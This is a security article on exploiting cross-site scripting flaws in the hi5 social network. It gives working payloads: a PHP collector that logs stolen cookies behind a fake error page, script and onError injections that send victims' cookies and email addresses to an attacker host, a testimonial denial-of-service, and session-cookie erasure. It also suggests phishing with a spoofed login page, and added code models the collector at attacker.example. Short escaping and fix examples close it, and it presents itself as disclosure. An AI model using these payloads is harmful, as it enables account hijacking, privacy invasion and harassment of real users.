XSS: Smashing hi5 for fun and profit 
This may not be a complete guide on how to hack your way into the hi5 website, but by the time you finish reading you'll realize that someone can invade your privacy or DoS your account in many ways. Best of all, you'll know how to protect yourself and reverse the situation!
Every attack described also shows the code needed and explains where and how to inject it. I take no responsibility for how readers use this information: the intent of this article is to expose the security problems and make people aware of them.
A special thanks to my friend André, AKA Max, who challenged me to expand the attack vectors and was also the test victim for some of the attacks.
All code presented here has been tested on Firefox for Linux and OS X.
1. Why the title?
If you work in security you have surely heard of aleph1's article on buffer overflows, Smashing the stack for fun and profit. Since we had a good laugh getting all the XSS to work, it definitely was fun, and that's when I realized I could play a bit with that title. But by no means am I thinking of making a profit from these problems.
2. Problem description
The hi5 website suffers from multiple XSS (Cross Site Scripting) problems. They allow an attacker to inject JavaScript into places like messages, testimonials, etc., and that JavaScript then runs on the victims' computers, inside the hi5 session of whoever views the injected content.
3. The attacks
3.1 Getting emails
Interested in getting someone's email address? No problem at all; it is surprisingly easy.
To perform this attack you have to do two things. First, write a small PHP script and host it somewhere. Then, wait for the victim to run a small piece of JavaScript that calls it. Let's go step by step, starting with the PHP script.
<?php
// Collector: appends the cookie string sent by the victim's browser to the
// file "cookies" (which must already exist and be writable) and then shows
// a fake 503 page so the victim suspects nothing.
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
if (!$handle = fopen('cookies', 'a')) echo 'ups';
if (fwrite($handle, $cookie . "\n") === FALSE) echo 'ups2'; // one entry per line
fclose($handle);
echo "<html><body><h1>503 Service Unavailable</h1></body></html>";
?>
NOTE: in the directory where you store this file you also have to create a file called cookies, otherwise the script will fail to write to it.
It was André who suggested spoofing a 503, but you can always spoof a hi5 page instead: just put the page you want in the last echo.
Now you have to make the victim run a small script that sends the browser to that page. Our favourite way is to send a message containing the script; it's easy and painless. Go to the person's hi5 page and select to send a message (the old restriction that you could only see people in your network no longer exists). In the subject write whatever you want, then in the body write the following (the cookie string is appended to the URL unencoded; wrapping it in encodeURIComponent() keeps cookie values containing & or + intact):
<script>location.replace('URL_FOR_PHPFILE.php?cookie='+document.cookie)</script>Hello, if you have JavaScript enabled you'll never see this message. If you don't, then you'll read this regular message.
Now, when the victim opens this message he or she will be redirected to your PHP file, the cookie will be stored, and you then only have to look for the Email= entry in the cookies file. The victim sees a 503 Service Unavailable page.
If you know that the victim doesn't use a popup blocker you can modify the attack a bit, as follows:
<?php
// Same collector, but the response closes the popup window it was opened in.
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
if (!$handle = fopen('cookies', 'a')) echo 'ups';
if (fwrite($handle, $cookie . "\n") === FALSE) echo 'ups2'; // one entry per line
fclose($handle);
echo "<html><body onLoad=\"window.close()\"></body></html>";
?>
And send the following message:
<script>window.open('URL_FOR_PHP.php?cookie='+document.cookie,'popup','width=1,height=1')</script>The message that the victim will read.
This will make a popup open and close again on the victim's computer.
But you can also collect emails passively. Imagine that you want your own log of who has visited your hi5 profile (the one hi5 displays doesn't show everyone). It can be done by adding the following code to one of the fields that accept HTML, such as the About me field.
<img src="" onError="window.open('URL_FOR_PHP.php?cookie='+document.cookie,'popup','width=1,height=1');">
Since no image can be loaded from an empty src, the onError event fires and runs the script! Once again, hi5 doesn't strip this out. You can still show a real image so that the broken-image icon doesn't give you away: add the following line to the handler
document.images[A_NUMBER].src='URL_TO_IMAGE';
You just have to try values for A_NUMBER, starting with 0, 1, 2, … (the images array is zero-indexed) until the image you want is changed. Inside the handler, this refers to the img element itself, so this.src='URL_TO_IMAGE' does the same job without guessing the index.
NOTE: You can also use the previous script to change some of hi5's own images. You just need to find their index in the images array.
NOTE: You can also use this attack in your message board.
IDEA: The redirect attack can also be used to send the victim to a spoofed login page in order to harvest usernames and passwords.
HOW TO PREVENT THIS KIND OF ATTACK: if a message comes from someone you don't know, it may be better to disable JavaScript in your browser first. Also, if you are asked to log in again, check the URL to see that it is really in the hi5.com domain.
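The collector side of this attack, as an added Node.js example (not code from the original article): it models what the victim's browser puts on the wire for the payload above, what the PHP collector receives via $_GET, and the "look for the Email= entry" step, all offline. The collector URL http://attacker.example/c.php and the parameter name "cookie" are assumed, matching the article's PHP script; every cookie string and request line here is constructed, not captured from a real victim. It also goes one step beyond the article by showing why the payload should URL-encode document.cookie.

```javascript
// Added example (not code from the original article): a Node.js model of
// the collector side of section 3.1. Assumed: the collector lives at
// http://attacker.example/c.php and takes the cookie in a query parameter
// called "cookie", as in the article's PHP script. Inputs are constructed.

const COLLECTOR = 'http://attacker.example/c.php'; // assumed, see lead-in

// Split a document.cookie string ("a=1; b=2") into a Map of name -> value.
function parseCookieString(cookieStr) {
  const jar = new Map();
  for (const part of cookieStr.split(';')) {
    const item = part.trim();
    const eq = item.indexOf('=');
    if (eq <= 0) continue;                 // empty or nameless entry
    jar.set(item.slice(0, eq), item.slice(eq + 1));
  }
  return jar;
}

// What the article's payload builds: document.cookie appended unencoded.
function naivePayloadUrl(documentCookie) {
  return COLLECTOR + '?cookie=' + documentCookie;
}

// The same payload with the cookie string URL-encoded first.
function encodedPayloadUrl(documentCookie) {
  return COLLECTOR + '?cookie=' + encodeURIComponent(documentCookie);
}

// What the browser actually sends for that URL: the WHATWG URL parser
// percent-encodes spaces in the query but leaves ';', '=', '&' and '+'
// alone, which is also what the victim's browser does.
function asRequestLine(url) {
  const u = new URL(url);
  return 'GET ' + u.pathname + u.search + ' HTTP/1.1';
}

// The collector's view: parse the request line the way PHP's $_GET would
// ('&' separates parameters, '+' means space, %XX is decoded) and pull
// out the two cookies the article cares about. Returns null when the
// request is not a GET or carries no "cookie" parameter.
function harvestFromRequestLine(requestLine) {
  const m = /^GET\s+(\S+)\s+HTTP\/1\.[01]$/.exec(requestLine);
  if (!m) return null;
  const q = m[1].indexOf('?');
  if (q === -1) return null;
  const raw = new URLSearchParams(m[1].slice(q + 1)).get('cookie');
  if (raw === null) return null;
  const jar = parseCookieString(raw);
  return {
    raw,
    email: jar.has('Email') ? jar.get('Email') : null,
    session: jar.has('JSESSIONID') ? jar.get('JSESSIONID') : null,
  };
}
```

With a constructed cookie string such as Email=x+y@example.com; JSESSIONID=DEF456; pref=a&b, the naive payload arrives at the collector as Email=x y@example.com; JSESSIONID=DEF456; pref=a: the + became a space and everything after the & was lost to a second query parameter, while the encoded payload arrives intact. That is the practical reason to wrap document.cookie in encodeURIComponent() in the injected script.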
3.2 Removing ads in the main profile view
Don't the banners at the top of the page annoy you? They do me! So I figured I would take them out for everyone who visits my main profile page. Interested in removing them too? Just add the following code to one of the HTML fields:
<img src="" onError="document.getElementById('ad_banner').innerHTML='YOUR_HTML_HERE';">
3.3 DoS the testimonials
While testing the scripts with André we found that there was a way to DoS the testimonials, making it impossible to accept or reject pending testimonials.
Just send a testimonial to someone with the following code:
<img src="" onError="alert('DoS')">
I know it looks silly, but the victim won't be able to reject or accept that testimonial, nor any other that is pending.
How to fix the situation if it happens to you: disabling JavaScript won't do the job this time, since rejecting uses JavaScript. What you have to do is select "Block images from hi5.com" in your browser, then go to the testimonial page and reject the attacking testimonials.
NOTE: This attack can also be done in the Photo comments and in the Fives comments.
3.4 Invalidating logins
You can also destroy the victim's hi5 session. After that hi5 won't know who the victim is, and when he or she tries to access parts of hi5 such as "My profile", "home", "My network", etc., they will be asked to register. It works because the session cookies are readable and writable from JavaScript: the script overwrites them with an expiry date in the past.
You can send the script through a message or put it in your profile. The cookie functions presented below are not ours; if you search Google for JavaScript cookies you'll find plenty of sites with these functions.
<img src="" onError="
function createCookie(name, value, days) {
  // Writes name=value for the site root; a negative 'days' puts the expiry
  // in the past, which makes the browser drop the cookie.
  var expires = '';
  if (days) {
    var date = new Date();
    date.setTime(date.getTime() + (days*24*60*60*1000));
    expires = '; expires=' + date.toGMTString();
  }
  document.cookie = name + '=' + value + expires + '; path=/';
}
function readCookie(name) {
  // Returns the value of the named cookie, or null if it is not set.
  var nameEQ = name + '=';
  var ca = document.cookie.split(';');
  for (var i = 0; i < ca.length; i++) {
    var c = ca[i];
    while (c.charAt(0) == ' ') c = c.substring(1, c.length);
    if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  }
  return null;
}
function eraseCookie(name) {
  createCookie(name, '', -1);
}
eraseCookie('Email');
eraseCookie('JSESSIONID');
">
4. Conclusions
Well, that's all for now. This could easily be fixed if the hi5 dev team escaped special characters correctly when writing user input back into the page, like they actually do in the Subject of messages.
We only showed you a couple of attacks, but the limit is your imagination: you can inject any JavaScript using img tags. Have fun, and don't do anything you would regret. Also warn your friends about the problems! Let's get everyone XSS-aware; maybe then the dev team will finally fix the problems I've been reporting since January!
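The fix the conclusion asks for, as an added Node.js example (not hi5's code; the article never shows hi5's server side). renderUnsafe() behaves the way the article says hi5 treated message bodies, testimonials and comments; renderEscaped() is the minimal correct fix for user text that belongs in HTML element content. The payloads are the ones quoted in sections 3.1 to 3.3, with the article's URL placeholders left as written, and the "active content" detector is only a crude check written for this example.

```javascript
// Added example (not hi5's code): output escaping, the fix the article's
// conclusion asks for, with the article's own payloads as test input.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Escape the five characters that can change meaning in HTML text and in
// quoted attribute values. All five are replaced in one pass, so the '&'
// of an entity the function just emitted is never escaped a second time.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the user-supplied text is dropped straight into the page,
// which is what the article describes for messages and testimonials.
function renderUnsafe(body) {
  return '<div class="message">' + body + '</div>';
}

// Fixed: escape at output time, in the HTML text context.
function renderEscaped(body) {
  return '<div class="message">' + escapeHtml(body) + '</div>';
}

// Crude detector used only by this example: a <script> tag, or any tag
// carrying an on* event-handler attribute. Enough to show the difference
// between the two renderers; a real test would parse the HTML instead.
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Payloads quoted from the article (URL placeholders left as written).
const PAYLOADS = [
  "<script>location.replace('URL_FOR_PHPFILE.php?cookie='+document.cookie)</script>",
  "<img src=\"\" onError=\"window.open('URL_FOR_PHP.php?cookie='+document.cookie,'popup','width=1,height=1');\">",
  "<img src=\"\" onError=\"alert('DoS')\">",
  "<img src=\"\" onError=\"document.getElementById('ad_banner').innerHTML='YOUR_HTML_HERE';\">",
];

// How many of the payloads still contain active content after rendering
// with the given renderer: PAYLOADS.length for renderUnsafe, 0 for renderEscaped.
function countActivePayloads(render) {
  return PAYLOADS.filter((p) => containsActiveContent(render(p))).length;
}
```

Escaping like this is the right fix for fields that are meant to hold plain text (message bodies, testimonials, comments, the subject line that hi5 already handled). It is not a fix for fields that intentionally accept HTML, such as the About me field: there the site needs an allow-list sanitizer that keeps harmless tags and drops script tags and every on* attribute, which this example does not implement. The same escapeHtml() is also sufficient for text placed inside an attribute value only when the attribute is always quoted; inside a script block or a URL a different encoding is needed.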